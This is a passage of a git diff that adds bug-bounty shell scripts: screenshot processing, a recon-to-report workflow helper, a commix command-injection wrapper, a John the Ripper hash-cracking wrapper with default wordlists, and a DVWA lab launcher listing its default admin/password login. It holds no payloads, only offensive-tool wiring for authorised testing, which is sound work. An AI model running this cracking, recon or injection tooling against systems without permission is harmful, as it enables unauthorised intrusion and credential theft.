echo -e "${GREEN}[✓] Screenshot saved: $FINAL_FILE${NC}"
|
||||
echo -e "${BLUE}[+] Copying path to clipboard...${NC}"
|
||||
|
||||
# Copy relative path to clipboard
|
||||
RELATIVE_PATH="screenshots/$(basename "$FINAL_FILE")"
|
||||
echo "$RELATIVE_PATH" | xclip -selection clipboard 2>/dev/null || \
|
||||
echo "$RELATIVE_PATH" | wl-copy 2>/dev/null || \
|
||||
echo -e "${YELLOW}[!] Could not copy to clipboard${NC}"
|
||||
|
||||
echo ""
|
||||
echo -e "${GREEN}Path: $RELATIVE_PATH${NC}"
|
||||
echo -e "${YELLOW}[!] Paste this into your vulnerability JSON:${NC}"
|
||||
echo -e ' "path": "'"$RELATIVE_PATH"'",'
|
||||
|
||||
# Show in file manager
|
||||
if command -v xdg-open &> /dev/null; then
|
||||
xdg-open "$(dirname "$FINAL_FILE")" &
|
||||
fi
|
||||
52
scripts/pentesting/bb-screenshot-batch
Executable file
52
scripts/pentesting/bb-screenshot-batch
Executable file
|
|
@ -0,0 +1,52 @@
|
|||
#!/usr/bin/env bash
|
||||
# Batch process existing screenshots with borders
|
||||
# Usage: bb-screenshot-batch.sh <directory>
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
SOURCE_DIR="${1:-.}"
|
||||
OUTPUT_DIR="${SOURCE_DIR}/processed"
|
||||
|
||||
if [[ ! -d "$SOURCE_DIR" ]]; then
|
||||
echo "Error: Directory not found: $SOURCE_DIR"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
mkdir -p "$OUTPUT_DIR"
|
||||
|
||||
echo "[+] Processing screenshots in: $SOURCE_DIR"
|
||||
echo "[+] Output directory: $OUTPUT_DIR"
|
||||
echo ""
|
||||
|
||||
# Find all PNG and JPG images
|
||||
IMAGES=$(find "$SOURCE_DIR" -maxdepth 1 \( -name "*.png" -o -name "*.jpg" -o -name "*.jpeg" \) | sort)
|
||||
|
||||
if [[ -z "$IMAGES" ]]; then
|
||||
echo "[-] No images found in $SOURCE_DIR"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
COUNT=0
|
||||
TOTAL=$(echo "$IMAGES" | wc -l)
|
||||
|
||||
while IFS= read -r IMAGE; do
|
||||
((COUNT++))
|
||||
FILENAME=$(basename "$IMAGE")
|
||||
OUTPUT_FILE="$OUTPUT_DIR/$FILENAME"
|
||||
|
||||
echo "[$COUNT/$TOTAL] Processing: $FILENAME"
|
||||
|
||||
# Add professional border and shadow
|
||||
convert "$IMAGE" \
|
||||
-bordercolor '#333333' -border 2 \
|
||||
-bordercolor white -border 10 \
|
||||
-bordercolor '#333333' -border 2 \
|
||||
\( +clone -background black -shadow 80x5+5+5 \) \
|
||||
+swap -background white -layers merge +repage \
|
||||
"$OUTPUT_FILE"
|
||||
|
||||
done <<< "$IMAGES"
|
||||
|
||||
echo ""
|
||||
echo "[✓] Processed $COUNT images"
|
||||
echo "[✓] Output: $OUTPUT_DIR"
|
||||
259
scripts/pentesting/bb-workflow
Executable file
259
scripts/pentesting/bb-workflow
Executable file
|
|
@ -0,0 +1,259 @@
|
|||
#!/usr/bin/env bash
|
||||
# Bug Bounty Workflow Helper
|
||||
# Manages the complete workflow from recon to report
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
PROGRAM="${1:-}"
|
||||
DOMAIN="${2:-}"
|
||||
BB_ROOT="${HOME}/bug-bounty"
|
||||
TEMPLATE_DIR="${HOME}/.claude/context/business/security/bug-bounty"
|
||||
|
||||
# Colors
|
||||
RED='\033[0;31m'
|
||||
GREEN='\033[0;32m'
|
||||
YELLOW='\033[1;33m'
|
||||
BLUE='\033[0;34m'
|
||||
NC='\033[0m' # No Color
|
||||
|
||||
show_usage() {
|
||||
cat << EOF
|
||||
Bug Bounty Workflow Helper
|
||||
|
||||
Usage: bb-workflow.sh <command> [args]
|
||||
|
||||
Commands:
|
||||
init <program> <domain> Initialize directory structure for new program
|
||||
recon <program> Run reconnaissance on program
|
||||
test <program> <url> <type> Quick vulnerability test helper
|
||||
screenshot <program> [type] Take annotated screenshot with border
|
||||
report <program> <vuln-id> Generate PDF report from JSON
|
||||
status <program> Show program status and findings
|
||||
|
||||
Examples:
|
||||
bb-workflow.sh init acme acme.com
|
||||
bb-workflow.sh recon acme
|
||||
bb-workflow.sh test acme http://localhost:3002 xss
|
||||
bb-workflow.sh screenshot acme vulnerability
|
||||
bb-workflow.sh report acme acme-xss-001
|
||||
|
||||
Directory Structure:
|
||||
~/bug-bounty/<program>/
|
||||
├── recon/ # Reconnaissance data
|
||||
├── screenshots/ # Evidence screenshots
|
||||
├── discoveries/ # Vulnerability JSON files
|
||||
└── reports/ # Generated PDF reports
|
||||
EOF
|
||||
}
|
||||
|
||||
init_program() {
|
||||
local program="$1"
|
||||
local domain="$2"
|
||||
|
||||
echo -e "${BLUE}[+] Initializing bug bounty program: $program${NC}"
|
||||
|
||||
mkdir -p "$BB_ROOT/$program"/{recon,screenshots,discoveries,reports}
|
||||
|
||||
# Create program info file
|
||||
cat > "$BB_ROOT/$program/info.txt" << EOF
|
||||
Program: $program
|
||||
Domain: $domain
|
||||
Started: $(date +%Y-%m-%d)
|
||||
Platform: [HackerOne/Bugcrowd/Other]
|
||||
Scope: [Add scope notes]
|
||||
|
||||
Rules:
|
||||
- [Add important rules from program policy]
|
||||
|
||||
Notes:
|
||||
- [Add your notes here]
|
||||
EOF
|
||||
|
||||
# Create .gitignore
|
||||
cat > "$BB_ROOT/$program/.gitignore" << EOF
|
||||
# Sensitive bug bounty data
|
||||
screenshots/
|
||||
discoveries/*.json
|
||||
reports/*.pdf
|
||||
recon/
|
||||
|
||||
# Keep directory structure
|
||||
!discoveries/.gitkeep
|
||||
!screenshots/.gitkeep
|
||||
!reports/.gitkeep
|
||||
!recon/.gitkeep
|
||||
EOF
|
||||
|
||||
touch "$BB_ROOT/$program"/{discoveries,screenshots,reports,recon}/.gitkeep
|
||||
|
||||
echo -e "${GREEN}[✓] Program initialized: $BB_ROOT/$program${NC}"
|
||||
echo -e "${YELLOW}[!] Edit info.txt with program details${NC}"
|
||||
}
|
||||
|
||||
run_recon() {
|
||||
local program="$1"
|
||||
local program_dir="$BB_ROOT/$program"
|
||||
|
||||
if [[ ! -d "$program_dir" ]]; then
|
||||
echo -e "${RED}[-] Program directory not found: $program_dir${NC}"
|
||||
echo -e "${YELLOW}[!] Run: bb-workflow.sh init $program <domain>${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Get domain from info.txt
|
||||
local domain=$(grep "^Domain:" "$program_dir/info.txt" | cut -d' ' -f2)
|
||||
|
||||
if [[ -z "$domain" ]]; then
|
||||
echo -e "${RED}[-] Domain not found in info.txt${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BLUE}[+] Running reconnaissance on $domain${NC}"
|
||||
echo -e "${YELLOW}[!] This will take some time...${NC}"
|
||||
|
||||
cd "$program_dir/recon"
|
||||
|
||||
# Run your existing recon scripts
|
||||
if [[ -x "${HOME}/scripts/passive-recon" ]]; then
|
||||
echo -e "${BLUE}[+] Running passive recon...${NC}"
|
||||
"${HOME}/scripts/passive-recon" "$domain"
|
||||
fi
|
||||
|
||||
if [[ -x "${HOME}/scripts/light-recon" ]]; then
|
||||
echo -e "${BLUE}[+] Running light recon...${NC}"
|
||||
"${HOME}/scripts/light-recon" "$domain"
|
||||
fi
|
||||
|
||||
if [[ -x "${HOME}/scripts/bb-recon" ]]; then
|
||||
echo -e "${BLUE}[+] Running bug bounty recon (safe mode)...${NC}"
|
||||
"${HOME}/scripts/bb-recon" "https://$domain"
|
||||
fi
|
||||
|
||||
echo -e "${GREEN}[✓] Reconnaissance complete!${NC}"
|
||||
echo -e "${YELLOW}[!] Review results in: $program_dir/recon/${NC}"
|
||||
|
||||
# Generate manual testing guide
|
||||
if [[ -x "${HOME}/scripts/bb-report-generator" ]]; then
|
||||
echo -e "${BLUE}[+] Generating manual testing guide...${NC}"
|
||||
# Find the most recent bb-recon directory
|
||||
latest_recon=$(find . -maxdepth 1 -type d -name "bb-recon-*" -printf '%T@ %p\n' | sort -rn | head -1 | cut -d' ' -f2)
|
||||
if [[ -n "$latest_recon" ]]; then
|
||||
"${HOME}/scripts/bb-report-generator" "$latest_recon"
|
||||
echo -e "${GREEN}[✓] Manual testing guide created!${NC}"
|
||||
echo -e "${CYAN}[*] Read: $latest_recon/manual-testing-guide.md${NC}"
|
||||
fi
|
||||
fi
|
||||
}
|
||||
|
||||
quick_test() {
|
||||
local program="$1"
|
||||
local url="$2"
|
||||
local type="$3"
|
||||
|
||||
echo -e "${BLUE}[+] Quick vulnerability test: $type${NC}"
|
||||
"${HOME}/scripts/quick-vuln-test.sh" "$url" "$type"
|
||||
}
|
||||
|
||||
take_screenshot() {
|
||||
local program="$1"
|
||||
local type="${2:-evidence}"
|
||||
|
||||
if [[ ! -d "$BB_ROOT/$program" ]]; then
|
||||
echo -e "${RED}[-] Program directory not found: $program${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
"${HOME}/scripts/bb-screenshot-annotate.sh" "$program" "$type"
|
||||
}
|
||||
|
||||
generate_report() {
|
||||
local program="$1"
|
||||
local vuln_id="$2"
|
||||
local program_dir="$BB_ROOT/$program"
|
||||
|
||||
local json_file="$program_dir/discoveries/${vuln_id}.json"
|
||||
local pdf_file="$program_dir/reports/${vuln_id}.pdf"
|
||||
|
||||
if [[ ! -f "$json_file" ]]; then
|
||||
echo -e "${RED}[-] JSON file not found: $json_file${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BLUE}[+] Generating PDF report...${NC}"
|
||||
|
||||
cd "$TEMPLATE_DIR"
|
||||
bun run latex/generate.ts "$json_file" "$pdf_file"
|
||||
|
||||
if [[ -f "$pdf_file" ]]; then
|
||||
echo -e "${GREEN}[✓] Report generated: $pdf_file${NC}"
|
||||
echo -e "${YELLOW}[!] Review before submitting!${NC}"
|
||||
|
||||
# Open PDF (if on desktop with xdg-open)
|
||||
if command -v xdg-open &> /dev/null; then
|
||||
xdg-open "$pdf_file" &
|
||||
fi
|
||||
else
|
||||
echo -e "${RED}[-] Report generation failed${NC}"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
show_status() {
|
||||
local program="$1"
|
||||
local program_dir="$BB_ROOT/$program"
|
||||
|
||||
if [[ ! -d "$program_dir" ]]; then
|
||||
echo -e "${RED}[-] Program not found: $program${NC}"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
echo -e "${BLUE}=== Bug Bounty Program Status ===${NC}"
|
||||
echo ""
|
||||
cat "$program_dir/info.txt"
|
||||
echo ""
|
||||
echo -e "${BLUE}=== Findings ===${NC}"
|
||||
|
||||
local findings=$(find "$program_dir/discoveries" -name "*.json" -not -name ".gitkeep" | wc -l)
|
||||
local reports=$(find "$program_dir/reports" -name "*.pdf" | wc -l)
|
||||
|
||||
echo "Total findings: $findings"
|
||||
echo "Generated reports: $reports"
|
||||
|
||||
if [[ $findings -gt 0 ]]; then
|
||||
echo ""
|
||||
echo "Discoveries:"
|
||||
ls -1 "$program_dir/discoveries/"*.json 2>/dev/null | xargs -n1 basename || true
|
||||
fi
|
||||
}
|
||||
|
||||
# Main command router
|
||||
case "${1:-}" in
|
||||
init)
|
||||
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] && show_usage && exit 1
|
||||
init_program "$2" "$3"
|
||||
;;
|
||||
recon)
|
||||
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||
run_recon "$2"
|
||||
;;
|
||||
test)
|
||||
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] || [[ -z "${4:-}" ]] && show_usage && exit 1
|
||||
quick_test "$2" "$3" "$4"
|
||||
;;
|
||||
screenshot|ss)
|
||||
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||
take_screenshot "$2" "${3:-evidence}"
|
||||
;;
|
||||
report)
|
||||
[[ -z "${2:-}" ]] || [[ -z "${3:-}" ]] && show_usage && exit 1
|
||||
generate_report "$2" "$3"
|
||||
;;
|
||||
status)
|
||||
[[ -z "${2:-}" ]] && show_usage && exit 1
|
||||
show_status "$2"
|
||||
;;
|
||||
*)
|
||||
show_usage
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
14
scripts/pentesting/commix
Executable file
14
scripts/pentesting/commix
Executable file
|
|
@ -0,0 +1,14 @@
|
|||
#!/usr/bin/env bash
|
||||
# Wrapper for commix (command injection testing tool)
|
||||
# Routes to the correct commix installation
|
||||
|
||||
COMMIX_PATH="/home/e/commix/commix.py"
|
||||
|
||||
if [[ ! -f "$COMMIX_PATH" ]]; then
|
||||
echo "Error: commix not found at $COMMIX_PATH" >&2
|
||||
echo "Install with: git clone https://github.com/commixproject/commix.git /home/e/commix" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Execute commix with python3
|
||||
exec python3 "$COMMIX_PATH" "$@"
|
||||
274
scripts/pentesting/crack
Executable file
274
scripts/pentesting/crack
Executable file
|
|
@ -0,0 +1,274 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: crack
|
||||
# Description: Hash cracking helper (john/hashcat wrapper)
|
||||
# Usage: crack <hashfile> # Auto-detect and crack
|
||||
# crack <hashfile> -w wordlist # Specify wordlist
|
||||
# crack <hashfile> -m md5 # Specify hash type
|
||||
# crack identify <hash> # Identify hash type
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}crack${NC} - Hash Cracking Helper v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " crack <hashfile> [OPTIONS]"
|
||||
echo " crack identify <hash>"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}crack <file>${NC} Crack hashes in file"
|
||||
echo -e " ${CYAN}identify <hash>${NC} Identify hash type"
|
||||
echo -e " ${CYAN}show <file>${NC} Show cracked passwords"
|
||||
echo
|
||||
echo -e "${BOLD}OPTIONS:${NC}"
|
||||
echo -e " ${CYAN}-w, --wordlist FILE${NC} Specify wordlist"
|
||||
echo -e " ${CYAN}-m, --mode TYPE${NC} Hash type (md5, sha1, sha256, ntlm, etc.)"
|
||||
echo -e " ${CYAN}-r, --rules${NC} Apply John rules"
|
||||
echo -e " ${CYAN}-f, --format${NC} John format string"
|
||||
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " crack hashes.txt # Auto crack with default wordlist"
|
||||
echo " crack hashes.txt -w rockyou.txt # Use specific wordlist"
|
||||
echo " crack hashes.txt -m md5 # Specify MD5 hashes"
|
||||
echo " crack identify 5f4dcc3b5aa765d61d8327deb882cf99"
|
||||
echo " crack show hashes.txt # Show cracked results"
|
||||
echo
|
||||
echo -e "${BOLD}COMMON HASH TYPES:${NC}"
|
||||
echo " md5, sha1, sha256, sha512"
|
||||
echo " ntlm, mssql, mysql"
|
||||
echo " bcrypt, des, raw-md5"
|
||||
echo
|
||||
echo -e "${BOLD}INSTALLED TOOLS:${NC}"
|
||||
command -v john &>/dev/null && echo -e " ${GREEN}✓${NC} john (John the Ripper)" || echo -e " ${RED}✗${NC} john (install: sudo apt install john)"
|
||||
command -v hashcat &>/dev/null && echo -e " ${GREEN}✓${NC} hashcat" || echo -e " ${RED}✗${NC} hashcat (install: sudo apt install hashcat)"
|
||||
command -v hashid &>/dev/null && echo -e " ${GREEN}✓${NC} hashid (hash identifier)" || echo -e " ${RED}✗${NC} hashid (install: pip install hashid)"
|
||||
}
|
||||
|
||||
# Detect available tools
|
||||
get_cracker() {
|
||||
if command -v john &>/dev/null; then
|
||||
echo "john"
|
||||
elif command -v hashcat &>/dev/null; then
|
||||
echo "hashcat"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} No hash cracker found" >&2
|
||||
echo "Install one: sudo apt install john hashcat" >&2
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Identify hash type
|
||||
identify_hash() {
|
||||
local hash="$1"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Identifying hash: ${BOLD}$hash${NC}"
|
||||
echo
|
||||
|
||||
if command -v hashid &>/dev/null; then
|
||||
hashid "$hash"
|
||||
else
|
||||
# Manual identification based on length
|
||||
local len=${#hash}
|
||||
|
||||
echo -e "${YELLOW}Hash Identification:${NC}"
|
||||
case "$len" in
|
||||
32)
|
||||
echo " Possible: MD5, NTLM"
|
||||
echo " John format: --format=raw-md5 or --format=nt"
|
||||
echo " Hashcat mode: -m 0 (MD5) or -m 1000 (NTLM)"
|
||||
;;
|
||||
40)
|
||||
echo " Possible: SHA1"
|
||||
echo " John format: --format=raw-sha1"
|
||||
echo " Hashcat mode: -m 100"
|
||||
;;
|
||||
64)
|
||||
echo " Possible: SHA256, SHA3-256"
|
||||
echo " John format: --format=raw-sha256"
|
||||
echo " Hashcat mode: -m 1400"
|
||||
;;
|
||||
128)
|
||||
echo " Possible: SHA512"
|
||||
echo " John format: --format=raw-sha512"
|
||||
echo " Hashcat mode: -m 1700"
|
||||
;;
|
||||
60)
|
||||
if [[ "$hash" =~ ^\$2[ayb]\$ ]]; then
|
||||
echo " Identified: bcrypt"
|
||||
echo " John format: --format=bcrypt"
|
||||
echo " Hashcat mode: -m 3200"
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo " Unknown hash type (length: $len)"
|
||||
echo " Try: hashid '$hash'"
|
||||
;;
|
||||
esac
|
||||
fi
|
||||
}
|
||||
|
||||
# Find common wordlists
|
||||
find_wordlist() {
|
||||
local wordlists=(
|
||||
"/usr/share/wordlists/rockyou.txt"
|
||||
"/usr/share/wordlists/rockyou.txt.gz"
|
||||
"/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt"
|
||||
"/usr/share/dict/words"
|
||||
)
|
||||
|
||||
for wordlist in "${wordlists[@]}"; do
|
||||
if [[ -f "$wordlist" ]]; then
|
||||
echo "$wordlist"
|
||||
return 0
|
||||
fi
|
||||
done
|
||||
|
||||
echo ""
|
||||
}
|
||||
|
||||
# Crack with John the Ripper
|
||||
crack_john() {
|
||||
local hashfile="$1"
|
||||
local format="${2:-}"
|
||||
local wordlist="${3:-}"
|
||||
local rules="${4:-false}"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Using John the Ripper"
|
||||
echo -e "${CYAN}[*]${NC} Hash file: $hashfile"
|
||||
|
||||
local john_args=""
|
||||
|
||||
if [[ -n "$format" ]]; then
|
||||
john_args="$john_args --format=$format"
|
||||
echo -e "${CYAN}[*]${NC} Format: $format"
|
||||
fi
|
||||
|
||||
if [[ -n "$wordlist" ]]; then
|
||||
if [[ "$wordlist" == *.gz ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Wordlist: $wordlist (gzipped)"
|
||||
john_args="$john_args --wordlist=<(zcat $wordlist)"
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Wordlist: $wordlist"
|
||||
john_args="$john_args --wordlist=$wordlist"
|
||||
fi
|
||||
else
|
||||
auto_wordlist=$(find_wordlist)
|
||||
if [[ -n "$auto_wordlist" ]]; then
|
||||
echo -e "${CYAN}[*]${NC} Using default wordlist: $auto_wordlist"
|
||||
john_args="$john_args --wordlist=$auto_wordlist"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [[ "$rules" == "true" ]]; then
|
||||
john_args="$john_args --rules"
|
||||
echo -e "${CYAN}[*]${NC} Rules: enabled"
|
||||
fi
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}[*]${NC} Starting crack..."
|
||||
echo
|
||||
|
||||
john $john_args "$hashfile"
|
||||
}
|
||||
|
||||
# Show cracked passwords
|
||||
show_cracked() {
|
||||
local hashfile="$1"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Cracked passwords for: ${BOLD}$hashfile${NC}"
|
||||
echo
|
||||
|
||||
if command -v john &>/dev/null; then
|
||||
john --show "$hashfile"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} John not available"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
command="$1"
|
||||
shift
|
||||
|
||||
case "$command" in
|
||||
identify|id)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: crack identify <hash>"
|
||||
exit 1
|
||||
fi
|
||||
identify_hash "$1"
|
||||
;;
|
||||
show)
|
||||
if [[ $# -lt 1 ]]; then
|
||||
echo -e "${RED}Error:${NC} Usage: crack show <hashfile>"
|
||||
exit 1
|
||||
fi
|
||||
show_cracked "$1"
|
||||
;;
|
||||
*)
|
||||
# Assume first arg is hashfile
|
||||
hashfile="$command"
|
||||
|
||||
if [[ ! -f "$hashfile" ]]; then
|
||||
echo -e "${RED}Error:${NC} Hash file not found: $hashfile"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Parse crack options
|
||||
format=""
|
||||
wordlist=""
|
||||
rules=false
|
||||
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case $1 in
|
||||
-w|--wordlist)
|
||||
wordlist="$2"
|
||||
shift 2
|
||||
;;
|
||||
-m|--mode|-f|--format)
|
||||
format="$2"
|
||||
shift 2
|
||||
;;
|
||||
-r|--rules)
|
||||
rules=true
|
||||
shift
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown option: $1"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
cracker=$(get_cracker)
|
||||
|
||||
case "$cracker" in
|
||||
john)
|
||||
crack_john "$hashfile" "$format" "$wordlist" "$rules"
|
||||
;;
|
||||
hashcat)
|
||||
echo -e "${YELLOW}⚠${NC} Hashcat support not yet implemented"
|
||||
echo "Use John the Ripper or implement hashcat wrapper"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
;;
|
||||
esac
|
||||
184
scripts/pentesting/dvwa
Executable file
184
scripts/pentesting/dvwa
Executable file
|
|
@ -0,0 +1,184 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: dvwa
|
||||
# Description: Damn Vulnerable Web Application launcher
|
||||
# Usage: dvwa start|stop|status|logs
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
CONTAINER_NAME="dvwa"
|
||||
IMAGE="vulnerables/web-dvwa"
|
||||
DEFAULT_PORT="8080"
|
||||
|
||||
# Find available port
|
||||
find_available_port() {
|
||||
local port="${1:-8080}"
|
||||
while lsof -Pi :$port -sTCP:LISTEN -t >/dev/null 2>&1 || sudo netstat -tuln | grep -q ":$port "; do
|
||||
echo -e "${YELLOW}⚠${NC} Port $port in use, trying next..." >&2
|
||||
port=$((port + 1))
|
||||
done
|
||||
echo "$port"
|
||||
}
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}dvwa${NC} - DVWA Launcher v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " dvwa <command>"
|
||||
echo
|
||||
echo -e "${BOLD}COMMANDS:${NC}"
|
||||
echo -e " ${CYAN}start${NC} Start DVWA"
|
||||
echo -e " ${CYAN}stop${NC} Stop DVWA"
|
||||
echo -e " ${CYAN}restart${NC} Restart DVWA"
|
||||
echo -e " ${CYAN}status${NC} Check if running"
|
||||
echo -e " ${CYAN}logs${NC} Show container logs"
|
||||
echo -e " ${CYAN}shell${NC} Open shell in container"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " dvwa start # Launch DVWA"
|
||||
echo " dvwa stop # Stop DVWA"
|
||||
echo " dvwa logs # View logs"
|
||||
echo
|
||||
echo -e "${BOLD}ACCESS:${NC}"
|
||||
echo " URL: ${BOLD}http://localhost:\$PORT${NC} (default: 8080, auto-detects if in use)"
|
||||
echo " Username: ${BOLD}admin${NC}"
|
||||
echo " Password: ${BOLD}password${NC}"
|
||||
echo
|
||||
echo -e "${BOLD}SETUP:${NC}"
|
||||
echo " 1. Navigate to http://localhost"
|
||||
echo " 2. Click 'Create / Reset Database' button"
|
||||
echo " 3. Login with admin/password"
|
||||
echo " 4. Set Security Level (low/medium/high/impossible)"
|
||||
echo
|
||||
echo -e "${BOLD}ABOUT:${NC}"
|
||||
echo " DVWA - Damn Vulnerable Web Application"
|
||||
echo " Perfect for testing: SQLi, XSS, CSRF, Command Injection, etc."
|
||||
echo " Docs: https://github.com/digininja/DVWA"
|
||||
}
|
||||
|
||||
check_docker() {
|
||||
if ! command -v docker &>/dev/null; then
|
||||
echo -e "${RED}Error:${NC} Docker not installed"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
start_dvwa() {
|
||||
# Find available port only when starting
|
||||
PORT=$(find_available_port "$DEFAULT_PORT")
|
||||
|
||||
if docker ps -a --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${YELLOW}⚠${NC} DVWA already running"
|
||||
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||
return 0
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Starting existing container..."
|
||||
docker start "$CONTAINER_NAME"
|
||||
fi
|
||||
else
|
||||
echo -e "${CYAN}[*]${NC} Pulling ${IMAGE}..."
|
||||
docker pull "$IMAGE"
|
||||
echo -e "${CYAN}[*]${NC} Starting DVWA..."
|
||||
docker run -d --name "$CONTAINER_NAME" -p "${PORT}:80" "$IMAGE"
|
||||
fi
|
||||
|
||||
echo -e "${GREEN}✓${NC} DVWA started"
|
||||
if [[ "$PORT" != "$DEFAULT_PORT" ]]; then
|
||||
echo -e "${YELLOW}⚠${NC} Using port ${PORT} (default ${DEFAULT_PORT} was in use)"
|
||||
fi
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${PORT}${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Login: ${BOLD}admin / password${NC}"
|
||||
echo
|
||||
echo -e "${YELLOW}Note:${NC} First time? Click 'Create / Reset Database' at the bottom"
|
||||
}
|
||||
|
||||
stop_dvwa() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${CYAN}[*]${NC} Stopping DVWA..."
|
||||
docker stop "$CONTAINER_NAME"
|
||||
echo -e "${GREEN}✓${NC} DVWA stopped"
|
||||
else
|
||||
echo -e "${YELLOW}⚠${NC} DVWA not running"
|
||||
fi
|
||||
}
|
||||
|
||||
restart_dvwa() {
|
||||
stop_dvwa
|
||||
sleep 2
|
||||
start_dvwa
|
||||
}
|
||||
|
||||
show_status() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
echo -e "${GREEN}●${NC} DVWA is ${GREEN}running${NC}"
|
||||
CURRENT_PORT=$(docker port "$CONTAINER_NAME" 80 2>/dev/null | cut -d: -f2)
|
||||
echo -e "${CYAN}[*]${NC} Access at: ${BOLD}http://localhost:${CURRENT_PORT}${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Login: ${BOLD}admin / password${NC}"
|
||||
docker ps --format "table {{.Names}}\t{{.Status}}\t{{.Ports}}" | grep -E "(NAMES|${CONTAINER_NAME})"
|
||||
else
|
||||
echo -e "${RED}●${NC} DVWA is ${RED}stopped${NC}"
|
||||
fi
|
||||
}
|
||||
|
||||
show_logs() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
docker logs -f "$CONTAINER_NAME"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} DVWA not running"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
open_shell() {
|
||||
if docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
|
||||
docker exec -it "$CONTAINER_NAME" /bin/bash
|
||||
else
|
||||
echo -e "${RED}Error:${NC} DVWA not running"
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Main
|
||||
check_docker
|
||||
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
case "$1" in
|
||||
start|up)
|
||||
start_dvwa
|
||||
;;
|
||||
stop|down)
|
||||
stop_dvwa
|
||||
;;
|
||||
restart)
|
||||
restart_dvwa
|
||||
;;
|
||||
status)
|
||||
show_status
|
||||
;;
|
||||
logs)
|
||||
show_logs
|
||||
;;
|
||||
shell|sh|bash)
|
||||
open_shell
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown command: $1"
|
||||
